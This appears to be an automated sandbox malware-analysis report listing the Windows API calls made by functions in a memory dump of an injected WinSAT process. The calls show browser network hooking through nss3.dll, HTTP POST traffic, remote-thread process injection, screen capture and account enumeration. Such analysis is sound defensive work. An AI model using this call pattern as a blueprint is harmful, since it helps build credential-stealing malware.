TlsAlloc.KERNEL32(01D32868,00000000,0000018C,00000000,00000000), ref: 01D1DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 01D1DD4A
CreateEventW.KERNEL32(01D32C30,00000001,00000000,?,84889912,?,00000001), ref: 01D1DD74
CreateMutexW.KERNEL32(01D32C30,00000000,?,18782822,?,00000001), ref: 01D1DD97
CreateFileMappingW.KERNEL32(00000000,01D32C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 01D1DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 01D1DDD8
GetDC.USER32(00000000), ref: 01D1DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 01D1DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 01D1DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 01D1DE32

Part of subcall function 01D29959: GetDIBits.GDI32(00000000,01D1DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01D29991
Part of subcall function 01D29959: GetDIBits.GDI32(00000000,01D1DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01D299A7
Part of subcall function 01D29959: DeleteObject.GDI32(01D1DE4B), ref: 01D299B4
Part of subcall function 01D29959: CreateDIBSection.GDI32(00000000,00000000,00000000,01D32888,?,?), ref: 01D29A24
Part of subcall function 01D29959: DeleteObject.GDI32(01D1DE4B), ref: 01D29A43

ReleaseDC.USER32(00000000,?), ref: 01D1DE56

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

CreateMutexW.KERNEL32(01D32C30,00000000,?,1898B122,?,00000001,01D328B8,?,00000102,01D328A4,01D32E70,00000010,?,?), ref: 01D1DF00
GetDC.USER32(00000000), ref: 01D1DF15
CreateCompatibleDC.GDI32(00000000), ref: 01D1DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 01D1DF3A
SelectObject.GDI32(00000000,00000000), ref: 01D1DF4D
ReleaseDC.USER32(00000000,00000001), ref: 01D1DF65

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D21A04, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 182

APIs

Part of subcall function 01D27E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 01D27E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 01D21A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01D21A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 01D21AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 01D21AFD

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 01D21B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 01D21B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 01D21BC0

Part of subcall function 01D254F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01D25505
Part of subcall function 01D254F1: GetLastError.KERNEL32 ref: 01D2550F
Part of subcall function 01D254F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01D2552F

InternetCloseHandle.WININET(00000000), ref: 01D21C05
InternetCloseHandle.WININET(?), ref: 01D21C0F
InternetCloseHandle.WININET(?), ref: 01D21C19

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

GET, xrefs: 01D21A76, 01D21AA1
nq<qFq, xrefs: 01D21BC0
HTTP/1.1, xrefs: 01D21A98
POST, xrefs: 01D21A6F

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 01D1E26A
GetMenuItemCount.USER32(00000000), ref: 01D1E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 01D1E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 01D1E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 01D1E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 01D1E2E2
EndMenu.USER32 ref: 01D1E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 01D1E302
GetSubMenu.USER32(00000000,00000000), ref: 01D1E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 01D1E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 01D1E361
GetMenuItemID.USER32(00000000,00000000), ref: 01D1E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 01D1E392

Part of subcall function 01D154A9: GetWindowInfo.USER32(?,?), ref: 01D15515
Part of subcall function 01D154A9: IntersectRect.USER32(?,?,-00000114), ref: 01D15538
Part of subcall function 01D154A9: IntersectRect.USER32(?,?,-00000114), ref: 01D1558E
Part of subcall function 01D154A9: GetDC.USER32(00000000), ref: 01D155D2
Part of subcall function 01D154A9: CreateCompatibleDC.GDI32(00000000), ref: 01D155E3
Part of subcall function 01D154A9: ReleaseDC.USER32(00000000,00000000), ref: 01D155ED
Part of subcall function 01D154A9: SelectObject.GDI32(00000000,?), ref: 01D15602
Part of subcall function 01D154A9: DeleteDC.GDI32(00000000), ref: 01D15610
Part of subcall function 01D154A9: TlsSetValue.KERNEL32(?), ref: 01D1565B
Part of subcall function 01D154A9: EqualRect.USER32(?,?), ref: 01D15675
Part of subcall function 01D154A9: SaveDC.GDI32(00000000), ref: 01D15680
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D1569B
Part of subcall function 01D154A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 01D156BB
Part of subcall function 01D154A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 01D156CD
Part of subcall function 01D154A9: RestoreDC.GDI32(00000000,?), ref: 01D156E4
Part of subcall function 01D154A9: SaveDC.GDI32(00000000), ref: 01D15706
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01D1571C
Part of subcall function 01D154A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01D15735
Part of subcall function 01D154A9: RestoreDC.GDI32(00000000,?), ref: 01D15743
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01D15756
Part of subcall function 01D154A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01D15766
Part of subcall function 01D154A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01D15778
Part of subcall function 01D154A9: TlsSetValue.KERNEL32(00000000), ref: 01D15792
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D157B2
Part of subcall function 01D154A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 01D157CE
Part of subcall function 01D154A9: SelectObject.GDI32(00000000,?), ref: 01D157E4
Part of subcall function 01D154A9: DeleteDC.GDI32(00000000), ref: 01D157EB
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D15813
Part of subcall function 01D154A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 01D15829

SetKeyboardState.USER32 ref: 01D1E3D1
SetEvent.KERNEL32 ref: 01D1E3DD

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D270A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 01D270B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,01D273A4,?,?,00000000,?), ref: 01D270D5
GetProcAddress.KERNEL32(FCIAddFile,?,01D273A4,?,?,00000000,?), ref: 01D270E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,01D273A4,?,?,00000000,?), ref: 01D270F9
GetProcAddress.KERNEL32(FCIDestroy,?,01D273A4,?,?,00000000,?), ref: 01D2710B
HeapCreate.KERNEL32(00000000,00080000,00000000,01D273A4,?,?,00000000,?), ref: 01D27136
FreeLibrary.KERNEL32(01D273A4,?,?,00000000,?), ref: 01D2714B

Strings

FCIDestroy, xrefs: 01D270FB
cabinet.dll, xrefs: 01D270B0
FCIFlushCabinet, xrefs: 01D270E9
FCICreate, xrefs: 01D270CF
FCIAddFile, xrefs: 01D270D7

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D150A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(01D323AC,0000FDE9,?), ref: 01D1515C

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

LeaveCriticalSection.KERNEL32(01D323AC,?,000000FF), ref: 01D151B7
EnterCriticalSection.KERNEL32(01D323AC), ref: 01D151D2
getpeername.WS2_32 ref: 01D1527F

Part of subcall function 01D2681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 01D26840

Strings

]QPG, xrefs: 01D1522A
YISQ, xrefs: 01D150EF
\[EP, xrefs: 01D150E8
OMAV, xrefs: 01D15232
YIST, xrefs: 01D1523A
EASV, xrefs: 01D15250
Z\AV, xrefs: 01D15248

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2D0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 01D2D107
GetProcAddress.KERNEL32(00000000,?), ref: 01D2D128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 01D2D159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 01D2D17C
FreeLibrary.KERNEL32(00000000), ref: 01D2D1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 01D2D1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 01D2D212

Part of subcall function 01D17125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 01D17138
Part of subcall function 01D17125: PathUnquoteSpacesW.SHLWAPI(?), ref: 01D171A0
Part of subcall function 01D17125: ExpandEnvironmentStringsW.KERNEL32(?,01D2D23A,00000104), ref: 01D171AD
Part of subcall function 01D17125: LocalFree.KERNEL32(?,.exe,00000000), ref: 01D171C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 01D2D2AB

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

Part of subcall function 01D289C2: PathSkipRootW.SHLWAPI(?), ref: 01D289CD
Part of subcall function 01D289C2: GetFileAttributesW.KERNEL32(?,?,00000000,01D2D261,?,?,?,?,?), ref: 01D289F5
Part of subcall function 01D289C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,01D2D261,?,?,?,?,?), ref: 01D28A03

Part of subcall function 01D2C912: LoadLibraryW.KERNEL32(?), ref: 01D2C929
Part of subcall function 01D2C912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8), ref: 01D2C955
Part of subcall function 01D2C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?), ref: 01D2C96C
Part of subcall function 01D2C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?), ref: 01D2C984
Part of subcall function 01D2C912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?,00000000), ref: 01D2C9A1
Part of subcall function 01D2C912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?,00000000), ref: 01D2CA0D

NetApiBufferFree.NETAPI32(?), ref: 01D2D2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 01D2D2E2

Part of subcall function 01D2786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 01D278AC
Part of subcall function 01D2786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 01D278B9

Strings

.exe, xrefs: 01D2D1BB, 01D2D267, 01D2D2EE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2C095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

EnterCriticalSection.KERNEL32(01D33FE4), ref: 01D2C0BC
LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C11A

Part of subcall function 01D21049: EnterCriticalSection.KERNEL32(01D32AC8), ref: 01D21064
Part of subcall function 01D21049: LeaveCriticalSection.KERNEL32(01D32AC8), ref: 01D210E7
Part of subcall function 01D21049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 01D211B2
Part of subcall function 01D21049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 01D213EC

LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C161

Part of subcall function 01D2835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 01D283B8

Part of subcall function 01D282E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 01D2831F

LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C2CC
EnterCriticalSection.KERNEL32(01D33FE4), ref: 01D2C2EB
LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C34D

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C376
EnterCriticalSection.KERNEL32(01D33FE4), ref: 01D2C395
LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C3DD

Strings

Accept-Encoding, xrefs: 01D2C1EB
identity, xrefs: 01D2C1DF
If-Modified-Since, xrefs: 01D2C20F

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D23048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 01D220C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 01D22105
Part of subcall function 01D220C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01D22172
Part of subcall function 01D220C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 01D221A7
Part of subcall function 01D220C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01D221DB
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 01D221FA
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 01D2220C
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 01D2221E
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 01D22230
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 01D22242
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 01D22254
Part of subcall function 01D220C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 01D2228D
Part of subcall function 01D220C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 01D2229C
Part of subcall function 01D220C4: InitializeCriticalSection.KERNEL32(01D3400C,?,?,00000000), ref: 01D222C9
Part of subcall function 01D220C4: WSAStartup.WS2_32(00000202,?), ref: 01D222DF
Part of subcall function 01D220C4: CreateEventW.KERNEL32(01D32C30,00000001,00000000,00000000,?,?,00000000), ref: 01D22300
Part of subcall function 01D220C4: GetLengthSid.ADVAPI32(00000000,000000FF,01D32C08,?,?,00000000), ref: 01D22335
Part of subcall function 01D220C4: GetCurrentProcessId.KERNEL32(00000000,037CF7D0,00000000,?,?,00000000), ref: 01D22362

SetErrorMode.KERNEL32(00008007,00000000), ref: 01D2306F
GetCommandLineW.KERNEL32(?), ref: 01D23079
CommandLineToArgvW.SHELL32(00000000), ref: 01D23080
LocalFree.KERNEL32(00000000), ref: 01D230D5

Part of subcall function 01D1E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 01D1E108
Part of subcall function 01D1E0FB: GetThreadDesktop.USER32(00000000), ref: 01D1E10F
Part of subcall function 01D1E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 01D1E128

Part of subcall function 01D15BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,01D230F6), ref: 01D15C03
Part of subcall function 01D15BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,01D230F6), ref: 01D15C0A
Part of subcall function 01D15BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,01D230F6), ref: 01D15C1C
Part of subcall function 01D15BF6: SetEvent.KERNEL32(01D32868,?,00000001), ref: 01D15C69
Part of subcall function 01D15BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 01D15C76

Part of subcall function 01D1DF74: DeleteObject.GDI32(00000000), ref: 01D1DF87
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DF97
Part of subcall function 01D1DF74: TlsFree.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFA2
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DFB0
Part of subcall function 01D1DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFBA
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DFC7
Part of subcall function 01D1DF74: SelectObject.GDI32(00000000,00000000), ref: 01D1DFE1
Part of subcall function 01D1DF74: DeleteObject.GDI32(00000000), ref: 01D1DFF2
Part of subcall function 01D1DF74: DeleteDC.GDI32(00000000), ref: 01D1DFFF
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1E010
Part of subcall function 01D1DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D1E01F
Part of subcall function 01D1DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01D1E038

Part of subcall function 01D22B08: GetModuleHandleW.KERNEL32(?), ref: 01D22B1F
Part of subcall function 01D22B08: GetProcAddress.KERNEL32(00000000,?), ref: 01D22B41

Part of subcall function 01D22D01: CreateMutexW.KERNEL32(01D32C30,00000001,?,32901130,?,00000001,?), ref: 01D22D91
Part of subcall function 01D22D01: GetLastError.KERNEL32 ref: 01D22DA3
Part of subcall function 01D22D01: CloseHandle.KERNEL32(000001E6), ref: 01D22DBA
Part of subcall function 01D22D01: ExitWindowsEx.USER32(00000014,80000000), ref: 01D22DFD
Part of subcall function 01D22D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 01D22E1C
Part of subcall function 01D22D01: SetEvent.KERNEL32(00000000), ref: 01D22E29
Part of subcall function 01D22D01: CloseHandle.KERNEL32(00000000), ref: 01D22E30
Part of subcall function 01D22D01: CloseHandle.KERNEL32(000001E6), ref: 01D22E42
Part of subcall function 01D22D01: ReadProcessMemory.KERNEL32(000000FF,00710014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 01D22EA6
Part of subcall function 01D22D01: Sleep.KERNEL32(000001F4), ref: 01D22EB8
Part of subcall function 01D22D01: IsWellKnownSid.ADVAPI32(037CF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 01D22EC9
Part of subcall function 01D22D01: ReadProcessMemory.KERNEL32(000000FF,00710014,00000000,00000001,00000000), ref: 01D22EF1
Part of subcall function 01D22D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 01D22F0D
Part of subcall function 01D22D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 01D22F50
Part of subcall function 01D22D01: CreateEventW.KERNEL32(01D32C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 01D22FCE
Part of subcall function 01D22D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01D22FE7
Part of subcall function 01D22D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01D22FF7
Part of subcall function 01D22D01: CloseHandle.KERNEL32(0000000C), ref: 01D2300D
Part of subcall function 01D22D01: CloseHandle.KERNEL32(?), ref: 01D23013
Part of subcall function 01D22D01: CloseHandle.KERNEL32(?), ref: 01D23016

Sleep.KERNEL32(000000FF,?,00000001), ref: 01D2312B
ExitProcess.KERNEL32(00000000,00000000), ref: 01D2313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 01D23157

Part of subcall function 01D22542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 01D22574
Part of subcall function 01D22542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01D2316D,?,00000000,?,?,00000000), ref: 01D225AB
Part of subcall function 01D22542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01D2316D,?,00000000,?,?,00000000), ref: 01D225CB
Part of subcall function 01D22542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,01D2316D,?,00000000), ref: 01D2261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-03A55903,00000000,00000000,00000000), ref: 01D23185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 01D23198
CloseHandle.KERNEL32(?), ref: 01D231A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 01D231B5
CloseHandle.KERNEL32(00000000), ref: 01D231BC

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 01D1DF87
CloseHandle.KERNEL32(00000000), ref: 01D1DF97
TlsFree.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFA2
CloseHandle.KERNEL32(00000000), ref: 01D1DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFBA
CloseHandle.KERNEL32(00000000), ref: 01D1DFC7
SelectObject.GDI32(00000000,00000000), ref: 01D1DFE1
DeleteObject.GDI32(00000000), ref: 01D1DFF2
DeleteDC.GDI32(00000000), ref: 01D1DFFF
CloseHandle.KERNEL32(00000000), ref: 01D1E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D1E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01D1E038

Part of subcall function 01D24DCA: CloseHandle.KERNEL32(00000000), ref: 01D24DD9
Part of subcall function 01D24DCA: CloseHandle.KERNEL32(00000000), ref: 01D24DE2

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 01D24CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 01D24D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 01D24D19
CreateProcessAsUserW.ADVAPI32(?,00000000,01D2C8F5,00000000,00000000,00000000,01D2C8F5,01D2C8F5,00000000,?,?,?,00000000,00000044), ref: 01D24D8A
CloseHandle.KERNEL32(?), ref: 01D24D9D
CloseHandle.KERNEL32(?), ref: 01D24DA2
FreeLibrary.KERNEL32(?), ref: 01D24DB9

Strings

userenv.dll, xrefs: 01D24CE6
CreateEnvironmentBlock, xrefs: 01D24D07
DestroyEnvironmentBlock, xrefs: 01D24D0F

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,01D220A9), ref: 01D1C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,01D220A9), ref: 01D1C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 01D1C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 01D1C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 01D1C14C

Part of subcall function 01D1BE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,01D1C160,01D32360), ref: 01D1BE72

Part of subcall function 01D2B58C: InitializeCriticalSection.KERNEL32(01D33FE4,76C61857,01D1C185,01D32360), ref: 01D2B5A2
Part of subcall function 01D2B58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 01D2B5DE
Part of subcall function 01D2B58C: GetProcAddress.KERNEL32(PR_SetError), ref: 01D2B5F0
Part of subcall function 01D2B58C: GetProcAddress.KERNEL32(PR_GetError), ref: 01D2B602

Strings

PR_Read, xrefs: 01D1C134
PR_Close, xrefs: 01D1C127
PR_Write, xrefs: 01D1C141
PR_OpenTCPSocket, xrefs: 01D1C11F
nss3.dll, xrefs: 01D1C10C

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D15C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 01D1DCA2: GetClassNameW.USER32(007101CA,?,00000101), ref: 01D1DCBD

GetWindowThreadProcessId.USER32(?,?), ref: 01D15CB4
ResetEvent.KERNEL32(00000010), ref: 01D15D03
PostMessageW.USER32(?,?,?,00000010), ref: 01D15D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 01D15D35

Part of subcall function 01D15B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 01D15B40
Part of subcall function 01D15B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 01D15B9A
Part of subcall function 01D15B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 01D15BD6
Part of subcall function 01D15B28: TerminateProcess.KERNEL32(?,00000000), ref: 01D15BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 01D15D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 01D15D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 01D15D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 01D15DA7

Part of subcall function 01D24DCA: CloseHandle.KERNEL32(00000000), ref: 01D24DD9
Part of subcall function 01D24DCA: CloseHandle.KERNEL32(00000000), ref: 01D24DE2

IntersectRect.USER32(?,?), ref: 01D15DC7
FillRect.USER32(?,?,00000006), ref: 01D15DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 01D15DED

Part of subcall function 01D27A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 01D27AB5

Part of subcall function 01D26B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,01D22E87,?,19367401,?,00000001,8889347B,00000002), ref: 01D26BA9
Part of subcall function 01D26B9E: CloseHandle.KERNEL32(00000000), ref: 01D26BB4

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 01D27AF0: WindowFromPoint.USER32(?,?), ref: 01D27B0C
Part of subcall function 01D27AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 01D27B3D
